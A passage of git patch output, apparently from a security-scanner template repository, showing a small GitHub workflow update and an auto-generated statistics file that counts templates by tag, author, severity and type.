100 | gaurang | 42 | | | | | | | -**139 directories, 1792 files**. +**143 directories, 1845 files**. From 361f562ae904824ce443af637c460a1404a4683d Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 01:17:08 +0530 Subject: [PATCH 1526/4083] minor update --- .github/workflows/templates-stats.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 60235df07a..3fbb305a96 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -25,7 +25,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/templates-stats + go get -v github.com/projectdiscovery/templates-stats@main shell: bash - name: Markdown Stats From 34aae172eec4bd2bba4bb53145f2ac52d6498a7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 Aug 2021 19:48:16 +0000 Subject: [PATCH 1527/4083] Auto Generated Templates Stats [Mon Aug 9 19:48:16 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1396 +++++++++++++++++++++--------------------- TOP-10.md | 24 +- 3 files changed, 711 insertions(+), 711 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 79957df57d..2706b78f94 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":576},{"name":"panel","count":214},{"name":"xss","count":213},{"name":"wordpress","count":198},{"name":"exposure","count":196},{"name":"rce","count":183},{"name":"lfi","count":168},{"name":"cve2020","count":155},{"name":"wp-plugin","count":133},{"name":"tech","count":100},{"name":"cve2021","count":92},{"name":"config","count":91},{"name":"cve2019","count":86},{"name":"cve2018","count":74},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":54},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"oob","count":41},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"ssrf","count":30},{"name":"cve2016","count":30},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"cve2015","count":18},{"name":"cisco","count":18},{"name":"sap","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2014","count":14},{"name":"misconfig","count":13},{"name":"auth-bypass","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"php","count":11},{"name":"fuzz","count":11},{"name":"cve2013","count":11},{"name":"router","count":11},{"name":"devops","count":11},{"name":"joomla","count":11},{"name":"magento","count":9},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"aws","count":8},{"name":"ftp","count":8},{"name":"xxe","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"vmware","count":7},{"name":"nginx","count":7},{"name":"login","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"coldfusion","count":6},{"name":"citrix","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"cve2010","count":6},{"name":"laravel","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"dell","count":6},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"wp-theme","count":5},{"name":"files","count":5},{"name":"drupal","count":5},{"name":"netgear","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"confluence","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"ibm","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"docker","count":4},{"name":"windows","count":4},{"name":"thinkcmf","count":4},{"name":"deserialization","count":4},{"name":"asp","count":4},{"name":"nodejs","count":4},{"name":"thinkphp","count":4},{"name":"moodle","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"artifactory","count":4},{"name":"tomcat","count":4},{"name":"vpn","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"jolokia","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"zhiyuan","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"resin","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"zabbix","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"wso2","count":3},{"name":"openssh","count":3},{"name":"itop","count":3},{"name":"backups","count":3},{"name":"amazon","count":3},{"name":"cve2008","count":3},{"name":"targa","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"r-seenet","count":3},{"name":"tikiwiki","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"microsoft","count":3},{"name":"lfr","count":3},{"name":"slack","count":3},{"name":"fanruan","count":3},{"name":"opensis","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"git","count":3},{"name":"symfony","count":3},{"name":"httpd","count":3},{"name":"grafana","count":3},{"name":"oa","count":3},{"name":"nacos","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"pega","count":2},{"name":"yapi","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"smb","count":2},{"name":"smtp","count":2},{"name":"dolibarr","count":2},{"name":"vrealize","count":2},{"name":"grav","count":2},{"name":"rockethchat","count":2},{"name":"seeyon","count":2},{"name":"huawei","count":2},{"name":"rstudio","count":2},{"name":"sonarqube","count":2},{"name":"oauth","count":2},{"name":"couchdb","count":2},{"name":"chiyu","count":2},{"name":"nexus","count":2},{"name":"wordfence","count":2},{"name":"shellshock","count":2},{"name":"xxljob","count":2},{"name":"igs","count":2},{"name":"hjtcloud","count":2},{"name":"hashicorp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"azure","count":2},{"name":"activemq","count":2},{"name":"emerge","count":2},{"name":"plesk","count":2},{"name":"linkerd","count":2},{"name":"cache","count":2},{"name":"flir","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"rockmongo","count":2},{"name":"nextjs","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"showdoc","count":2},{"name":"ucmdb","count":2},{"name":"ecology","count":2},{"name":"voipmonitor","count":2},{"name":"glassfish","count":2},{"name":"maian","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"hpe","count":2},{"name":"service","count":2},{"name":"natshell","count":2},{"name":"webcam","count":2},{"name":"hasura","count":2},{"name":"bigip","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"paloalto","count":2},{"name":"horde","count":2},{"name":"nagios","count":2},{"name":"backdoor","count":2},{"name":"saltstack","count":2},{"name":"sharepoint","count":2},{"name":"prometheus","count":2},{"name":"spark","count":2},{"name":"proxy","count":2},{"name":"icewarp","count":2},{"name":"phpcollab","count":2},{"name":"status","count":2},{"name":"mida","count":2},{"name":"cve2007","count":2},{"name":"akamai","count":2},{"name":"waf","count":2},{"name":"kibana","count":2},{"name":"fortios","count":2},{"name":"injection","count":2},{"name":"keycloak","count":2},{"name":"jsf","count":2},{"name":"guacamole","count":2},{"name":"jellyfin","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"odoo","count":2},{"name":"idrac","count":2},{"name":"jeedom","count":2},{"name":"jboss","count":2},{"name":"cve2005","count":2},{"name":"frp","count":2},{"name":"leak","count":2},{"name":"openam","count":2},{"name":"avantfax","count":2},{"name":"opencast","count":1},{"name":"concrete","count":1},{"name":"cherokee","count":1},{"name":"heroku","count":1},{"name":"appweb","count":1},{"name":"adminer","count":1},{"name":"froxlor","count":1},{"name":"upload","count":1},{"name":"xiuno","count":1},{"name":"solman","count":1},{"name":"sitecore","count":1},{"name":"tongda","count":1},{"name":"acme","count":1},{"name":"zcms","count":1},{"name":"uwsgi","count":1},{"name":"nweb2fax","count":1},{"name":"discourse","count":1},{"name":"h3c-imc","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"codeigniter","count":1},{"name":"jeewms","count":1},{"name":"addpac","count":1},{"name":"wmt","count":1},{"name":"ns","count":1},{"name":"firebase","count":1},{"name":"fedora","count":1},{"name":"sentry","count":1},{"name":"ilo4","count":1},{"name":"sangfor","count":1},{"name":"centreon","count":1},{"name":"saltapi","count":1},{"name":"wiki","count":1},{"name":"zeroshell","count":1},{"name":"zzzcms","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"mysql","count":1},{"name":"sprintful","count":1},{"name":"csod","count":1},{"name":"extractor","count":1},{"name":"visualtools","count":1},{"name":"nuuo","count":1},{"name":"wavemaker","count":1},{"name":"thinkadmin","count":1},{"name":"qcubed","count":1},{"name":"openx","count":1},{"name":"etouch","count":1},{"name":"nedi","count":1},{"name":"ssltls","count":1},{"name":"emc","count":1},{"name":"rmi","count":1},{"name":"fuelcms","count":1},{"name":"ruckus","count":1},{"name":"lg-nas","count":1},{"name":"xff","count":1},{"name":"proftpd","count":1},{"name":"powercreator","count":1},{"name":"tileserver","count":1},{"name":"glances","count":1},{"name":"flink","count":1},{"name":"pulsesecure","count":1},{"name":"javafaces","count":1},{"name":"zenario","count":1},{"name":"dvr","count":1},{"name":"turbocrm","count":1},{"name":"websvn","count":1},{"name":"opm","count":1},{"name":"nexusdb","count":1},{"name":"gridx","count":1},{"name":"cobub","count":1},{"name":"redhat","count":1},{"name":"starttls","count":1},{"name":"cerebro","count":1},{"name":"nc2","count":1},{"name":"selea","count":1},{"name":"bedita","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"faraday","count":1},{"name":"spf","count":1},{"name":"bolt","count":1},{"name":"commscope","count":1},{"name":"calendarix","count":1},{"name":"pyramid","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"gitlist","count":1},{"name":"pgadmin","count":1},{"name":"panos","count":1},{"name":"octobercms","count":1},{"name":"alertmanager","count":1},{"name":"opensmtpd","count":1},{"name":"xdcms","count":1},{"name":"labtech","count":1},{"name":"phalcon","count":1},{"name":"sqlite","count":1},{"name":"dotclear","count":1},{"name":"duomicms","count":1},{"name":"jenkin","count":1},{"name":"cocoon","count":1},{"name":"timesheet","count":1},{"name":"jnoj","count":1},{"name":"wuzhicms","count":1},{"name":"rsyncd","count":1},{"name":"mirai","count":1},{"name":"springframework","count":1},{"name":"plc","count":1},{"name":"wazuh","count":1},{"name":"arl","count":1},{"name":"redis","count":1},{"name":"haproxy","count":1},{"name":"linux","count":1},{"name":"csrf","count":1},{"name":"xml","count":1},{"name":"cse","count":1},{"name":"goahead","count":1},{"name":"cloudflare","count":1},{"name":"nordex","count":1},{"name":"checkpoint","count":1},{"name":"vsftpd","count":1},{"name":"beanshell","count":1},{"name":"lancom","count":1},{"name":"openstack","count":1},{"name":"mara","count":1},{"name":"spectracom","count":1},{"name":"fastcgi","count":1},{"name":"tensorboard","count":1},{"name":"ioncube","count":1},{"name":"expose","count":1},{"name":"cloudinary","count":1},{"name":"nomad","count":1},{"name":"gotmls","count":1},{"name":"zend","count":1},{"name":"phpinfo","count":1},{"name":"aruba","count":1},{"name":"optiLink","count":1},{"name":"moinmoin","count":1},{"name":"spidercontrol","count":1},{"name":"cacti","count":1},{"name":"alerta","count":1},{"name":"episerver","count":1},{"name":"zm","count":1},{"name":"node-red-dashboard","count":1},{"name":"discord","count":1},{"name":"glpi","count":1},{"name":"primetek","count":1},{"name":"drone","count":1},{"name":"qsan","count":1},{"name":"db","count":1},{"name":"lanproxy","count":1},{"name":"argussurveillance","count":1},{"name":"sage","count":1},{"name":"smartsense","count":1},{"name":"livezilla","count":1},{"name":"magicflow","count":1},{"name":"emby","count":1},{"name":"varnish","count":1},{"name":"email","count":1},{"name":"kafdrop","count":1},{"name":"upnp","count":1},{"name":"lutron","count":1},{"name":"servicedesk","count":1},{"name":"netis","count":1},{"name":"fortigate","count":1},{"name":"visionhub","count":1},{"name":"subrion","count":1},{"name":"feifeicms","count":1},{"name":"memcached","count":1},{"name":"wamp","count":1},{"name":"dompdf","count":1},{"name":"woocomernce","count":1},{"name":"auth","count":1},{"name":"sarg","count":1},{"name":"ambari","count":1},{"name":"openrestry","count":1},{"name":"b2evolution","count":1},{"name":"rfi","count":1},{"name":"ghost","count":1},{"name":"bigbluebutton","count":1},{"name":"lighttpd","count":1},{"name":"eprints","count":1},{"name":"nette","count":1},{"name":"k8s","count":1},{"name":"mobileiron","count":1},{"name":"linksys","count":1},{"name":"panabit","count":1},{"name":"cgi","count":1},{"name":"phpfusion","count":1},{"name":"eyou","count":1},{"name":"2014","count":1},{"name":"embedthis","count":1},{"name":"traefik","count":1},{"name":"netsweeper","count":1},{"name":"spip","count":1},{"name":"openemr","count":1},{"name":"postgres","count":1},{"name":"ssl","count":1},{"name":"chevereto","count":1},{"name":"clink-office","count":1},{"name":"qvisdvr","count":1},{"name":"mantis","count":1},{"name":"anchorcms","count":1},{"name":"metinfo","count":1},{"name":"comodo","count":1},{"name":"esmtp","count":1},{"name":"openerp","count":1},{"name":"aura","count":1},{"name":"hadoop","count":1},{"name":"tapestry","count":1},{"name":"pacsone","count":1},{"name":"majordomo2","count":1},{"name":"nuxeo","count":1},{"name":"scimono","count":1},{"name":"zookeeper","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"domxss","count":1},{"name":"scs","count":1},{"name":"sgp","count":1},{"name":"triconsole","count":1},{"name":"klog","count":1},{"name":"achecker","count":1},{"name":"geddy","count":1},{"name":"pagespeed","count":1},{"name":"dnssec","count":1},{"name":"ulterius","count":1},{"name":"xmlchart","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"octoprint","count":1},{"name":"qdpm","count":1},{"name":"plastic","count":1},{"name":"setup","count":1},{"name":"gateone","count":1},{"name":"soar","count":1},{"name":"floc","count":1},{"name":"tieline","count":1},{"name":"fortiweb","count":1},{"name":"tamronos","count":1},{"name":"viewpoint","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"gloo","count":1},{"name":"k8","count":1},{"name":"fiori","count":1},{"name":"plugin","count":1},{"name":"huijietong","count":1},{"name":"crm","count":1},{"name":"circontrol","count":1},{"name":"circontrorl","count":1},{"name":"zarafa","count":1},{"name":"monitorr","count":1},{"name":"rhymix","count":1},{"name":"exchange","count":1},{"name":"ems","count":1},{"name":"wildfly","count":1},{"name":"opensns","count":1},{"name":"dom","count":1},{"name":"bookstack","count":1},{"name":"gogs","count":1},{"name":"favicon","count":1},{"name":"mautic","count":1},{"name":"getsimple","count":1},{"name":"webadmin","count":1},{"name":"manageengine","count":1},{"name":"redwood","count":1},{"name":"mongoshake","count":1},{"name":"ecom","count":1},{"name":"prestashop","count":1},{"name":"empirecms","count":1},{"name":"vsphere","count":1},{"name":"wondercms","count":1},{"name":"acontent","count":1},{"name":"phpunit","count":1},{"name":"alibaba","count":1},{"name":"servicenow","count":1},{"name":"resourcespace","count":1},{"name":"druid","count":1},{"name":"clave","count":1},{"name":"xvr","count":1},{"name":"redcap","count":1},{"name":"tensorflow","count":1},{"name":"hortonworks","count":1},{"name":"mariadb","count":1},{"name":"webmodule-ee","count":1},{"name":"perl","count":1},{"name":"gespage","count":1},{"name":"netdata","count":1},{"name":"javamelody","count":1},{"name":"timeclock","count":1},{"name":"fortinet","count":1},{"name":"netrc","count":1},{"name":"npm","count":1},{"name":"bash","count":1},{"name":"xunchi","count":1},{"name":"avtech","count":1},{"name":"dotnetnuke","count":1},{"name":"realteo","count":1},{"name":"plone","count":1},{"name":"default","count":1},{"name":"apos","count":1},{"name":"ec2","count":1},{"name":"blackboard","count":1},{"name":"sureline","count":1},{"name":"doh","count":1},{"name":"webui","count":1},{"name":"sco","count":1},{"name":"wavlink","count":1},{"name":"postmessage","count":1},{"name":"ganglia","count":1},{"name":"kyan","count":1},{"name":"pippoint","count":1},{"name":"jquery","count":1},{"name":"ntopng","count":1},{"name":"chinaunicom","count":1},{"name":"weiphp","count":1},{"name":"webmin","count":1},{"name":"api-manager","count":1},{"name":"idemia","count":1},{"name":"mailchimp","count":1},{"name":"rdp","count":1},{"name":"synnefo","count":1},{"name":"mdb","count":1},{"name":"dvwa","count":1},{"name":"payara","count":1},{"name":"grails","count":1},{"name":"biometrics","count":1},{"name":"office365","count":1},{"name":"mpsec","count":1},{"name":"landray","count":1},{"name":"tika","count":1},{"name":"svnserve","count":1},{"name":"yachtcontrol","count":1},{"name":"oscommerce","count":1},{"name":"kong","count":1},{"name":"fortigates","count":1},{"name":"rujjie","count":1},{"name":"mcafee","count":1},{"name":"krweb","count":1},{"name":"linkedin","count":1},{"name":"shopware","count":1},{"name":"keenetic","count":1},{"name":"fortilogger","count":1},{"name":"node","count":1},{"name":"totaljs","count":1},{"name":"jenzabar","count":1},{"name":"mediumish","count":1},{"name":"htmli","count":1},{"name":"exposures","count":1},{"name":"blind","count":1},{"name":"landrayoa","count":1},{"name":"bruteforce","count":1},{"name":"svn","count":1},{"name":"codemeter","count":1},{"name":"jitsi","count":1},{"name":"wooyun","count":1},{"name":"tpshop","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"erp-nc","count":1},{"name":"avalanche","count":1},{"name":"cors","count":1},{"name":"jsp","count":1},{"name":"exacqvision","count":1},{"name":"mantisbt","count":1},{"name":"rubedo","count":1},{"name":"clockwatch","count":1},{"name":"vnc","count":1},{"name":"monitorix","count":1},{"name":"apiman","count":1},{"name":"seacms","count":1},{"name":"geutebruck","count":1},{"name":"stem","count":1},{"name":"sourcebans","count":1},{"name":"ueditor","count":1},{"name":"kerbynet","count":1},{"name":"harbor","count":1},{"name":"yealink","count":1},{"name":"acexy","count":1},{"name":"razor","count":1},{"name":"vscode","count":1},{"name":"nps","count":1},{"name":"expressjs","count":1},{"name":"skywalking","count":1},{"name":"bitly","count":1},{"name":"ricoh","count":1},{"name":"blue-ocean","count":1},{"name":"lotuscms","count":1},{"name":"liferay","count":1},{"name":"portainer","count":1},{"name":"shopxo","count":1},{"name":"trilithic","count":1},{"name":"rmc","count":1},{"name":"jmx","count":1},{"name":"myucms","count":1},{"name":"st","count":1},{"name":"expn","count":1},{"name":"szhe","count":1},{"name":"moin","count":1},{"name":"sidekiq","count":1},{"name":"wing-ftp","count":1},{"name":"yii","count":1},{"name":"javascript","count":1},{"name":"aspnuke","count":1},{"name":"spring","count":1},{"name":"webftp","count":1},{"name":"socomec","count":1},{"name":"wifisky","count":1},{"name":"sceditor","count":1},{"name":"camunda","count":1},{"name":"tenda","count":1},{"name":"opentsdb","count":1},{"name":"twitter-server","count":1},{"name":"jfrog","count":1},{"name":"iptime","count":1},{"name":"bullwark","count":1},{"name":"mongo","count":1},{"name":"cve2006","count":1},{"name":"lansweeper","count":1},{"name":"zyxel","count":1},{"name":"darkstat","count":1},{"name":"axis","count":1},{"name":"clusterengine","count":1},{"name":"viewlinc","count":1},{"name":"fastapi","count":1},{"name":"zte","count":1},{"name":"kubeflow","count":1},{"name":"flash","count":1},{"name":"cofax","count":1},{"name":"salesforce","count":1},{"name":"interlib","count":1},{"name":"zmanda","count":1},{"name":"diris","count":1},{"name":"centos","count":1}],"authors":[{"name":"pikpikcu","count":234},{"name":"dhiyaneshdk","count":234},{"name":"pdteam","count":191},{"name":"daffainfo","count":128},{"name":"geeknik","count":127},{"name":"dwisiswant0","count":127},{"name":"gy741","count":62},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":40},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"r3dg33k","count":9},{"name":"hackergautam","count":9},{"name":"wdahlenb","count":9},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":5},{"name":"rootxharsh","count":5},{"name":"ganofins","count":5},{"name":"pentest_swissky","count":5},{"name":"joanbono","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"fyoorer","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"vavkamil","count":2},{"name":"0xsapra","count":2},{"name":"bp0lr","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"x1m_martijn","count":2},{"name":"ree4pwn","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"davidmckennirey","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"zomsop82","count":2},{"name":"w4cky_","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"sushantkamble","count":2},{"name":"swissky","count":2},{"name":"lu4nx","count":2},{"name":"afaq","count":2},{"name":"incogbyte","count":2},{"name":"lotusdll","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"gal nagli","count":2},{"name":"0xprial","count":2},{"name":"hetroublemakr","count":2},{"name":"ehsahil","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"randomrobbie","count":2},{"name":"manas_harsh","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"nkxxkn","count":2},{"name":"kiblyn11","count":2},{"name":"unstabl3","count":2},{"name":"hahwul","count":2},{"name":"soyelmago","count":1},{"name":"me9187","count":1},{"name":"its0x08","count":1},{"name":"0ut0fb4nd","count":1},{"name":"gboddin","count":1},{"name":"knassar702","count":1},{"name":"pudsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"zandros0","count":1},{"name":"petruknisme","count":1},{"name":"taielab","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"alperenkesk","count":1},{"name":"mesaglio","count":1},{"name":"bjhulst","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"bernardofsr","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sy3omda","count":1},{"name":"yavolo","count":1},{"name":"_harleo","count":1},{"name":"0xteles","count":1},{"name":"d0rkerdevil","count":1},{"name":"juicypotato1","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"adrianmf","count":1},{"name":"mass0ma","count":1},{"name":"shreyapohekar","count":1},{"name":"naglinagli","count":1},{"name":"ldionmarcil","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"0xrod","count":1},{"name":"defr0ggy","count":1},{"name":"dogasantos","count":1},{"name":"jteles","count":1},{"name":"b4uh0lz","count":1},{"name":"s1r1u5_","count":1},{"name":"fmunozs","count":1},{"name":"noamrathaus","count":1},{"name":"regala_","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"cookiehanhoan","count":1},{"name":"r3naissance","count":1},{"name":"ooooooo_q","count":1},{"name":"un-fmunozs","count":1},{"name":"retr0","count":1},{"name":"vzamanillo","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"andirrahmani1","count":1},{"name":"akash.c","count":1},{"name":"luskabol","count":1},{"name":"yashanand155","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"huowuzhao","count":1},{"name":"ohlinge","count":1},{"name":"arcc","count":1},{"name":"_darrenmartyn","count":1},{"name":"iampritam","count":1},{"name":"b0yd","count":1},{"name":"shifacyclewla","count":1},{"name":"undefl0w","count":1},{"name":"mubassirpatel","count":1},{"name":"raesene","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"abison_binoy","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"52971","count":1},{"name":"elder tao","count":1},{"name":"schniggie","count":1},{"name":"bolli95","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"absshax","count":1},{"name":"ahmed sherif","count":1},{"name":"mhdsamx","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"makyotox","count":1},{"name":"tim_koopmans","count":1},{"name":"shelld3v","count":1},{"name":"streetofhackerr007","count":1},{"name":"aresx","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"bad5ect0r","count":1},{"name":"udyz","count":1},{"name":"furkansenan","count":1},{"name":"smaranchand","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"j33n1k4","count":1},{"name":"sshell","count":1},{"name":"apt-mirror","count":1},{"name":"elmahdi","count":1},{"name":"willd96","count":1},{"name":"jeya seelan","count":1},{"name":"sickwell","count":1},{"name":"nytr0gen","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"becivells","count":1},{"name":"idealphase","count":1},{"name":"alph4byt3","count":1},{"name":"dawid czarnecki","count":1},{"name":"yashgoti","count":1},{"name":"andysvints","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"c3l3si4n","count":1},{"name":"deena","count":1},{"name":"berkdusunur","count":1},{"name":"johnk3r","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"alex","count":1},{"name":"@dwisiswant0","count":1},{"name":"ilovebinbash","count":1},{"name":"philippdelteil","count":1},{"name":"manuelbua","count":1},{"name":"luci","count":1},{"name":"blckraven","count":1},{"name":"ipanda","count":1},{"name":"hanlaomo","count":1},{"name":"divya_mudgal","count":1},{"name":"akshansh","count":1},{"name":"whynotke","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"affix","count":1},{"name":"pratik khalane","count":1},{"name":"fopina","count":1},{"name":"patralos","count":1},{"name":"_c0wb0y_","count":1},{"name":"mohammedsaneem","count":1},{"name":"daviey","count":1},{"name":"notsoevilweasel","count":1},{"name":"rodnt","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"kabirsuda","count":1},{"name":"rojanrijal","count":1},{"name":"johnjhacking","count":1},{"name":"co0nan","count":1},{"name":"flag007","count":1},{"name":"ajaysenr","count":1},{"name":"remonsec","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"micha3lb3n","count":1},{"name":"thevillagehacker","count":1},{"name":"geraldino2","count":1}],"directory":[{"name":"Users","count":1828}],"severity":[{"name":"info","count":577},{"name":"high","count":457},{"name":"medium","count":385},{"name":"critical","count":218},{"name":"low","count":156}],"types":[{"name":"http","count":1696},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":576},{"name":"panel","count":214},{"name":"xss","count":213},{"name":"wordpress","count":198},{"name":"exposure","count":196},{"name":"rce","count":183},{"name":"lfi","count":168},{"name":"cve2020","count":155},{"name":"wp-plugin","count":133},{"name":"tech","count":100},{"name":"cve2021","count":92},{"name":"config","count":91},{"name":"cve2019","count":86},{"name":"cve2018","count":74},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":54},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"oob","count":41},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"cve2016","count":30},{"name":"ssrf","count":30},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"sap","count":18},{"name":"cve2015","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"cve2014","count":14},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"auth-bypass","count":13},{"name":"misconfig","count":13},{"name":"cve2011","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"a